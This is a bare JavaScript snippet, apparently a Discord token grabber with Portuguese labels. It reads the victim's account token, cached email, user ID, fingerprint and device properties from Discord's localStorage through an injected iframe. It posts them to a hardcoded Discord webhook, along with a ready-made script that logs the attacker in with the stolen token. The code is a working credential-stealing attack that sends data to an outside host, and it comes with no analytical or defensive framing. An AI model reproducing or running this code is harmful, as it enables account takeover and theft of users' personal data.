location.reload();
var discordWebhook = "https://discord.com/api/webhooks/841029865725231144/BPI73gTo8VXL8iBwta0wt1ofBxOxEi08vqG3JOFGY_wsH7n3AEcGxoit2HUtsx492hwS";
var i = document.createElement('iframe');
document.body.appendChild(i);
var request = new XMLHttpRequest();
request.open("POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
    username: "nao e um token grabber",
    avatar_url: "https://i.redd.it/plrjr2a013251.jpg",
    content: '**Nova conta hackeada!**\n------------------\nToken : ' + i.contentWindow.localStorage.token + '\n------------------\email : ' + i.contentWindow.localStorage.email_cache + '\n------------------\nUser ID : ' + i.contentWindow.localStorage.user_id_cache + '\n------------------\nFingerprint : ' + i.contentWindow.localStorage.fingerprint + '\n------------------\nPropriedades : \`\`\`json\n' + i.contentWindow.localStorage.deviceProperties + '\`\`\`------------------\nScript para logar : \n\`\`\`js\nlocation.reload();var i = document.createElement(\'iframe\');document.body.appendChild(i);i.contentWindow.localStorage.token = "\\"' + i.contentWindow.localStorage.token.replace(/^"(.*)"$/, '$1') + '\\""\`\`\`'
};
request.send(JSON.stringify(params));
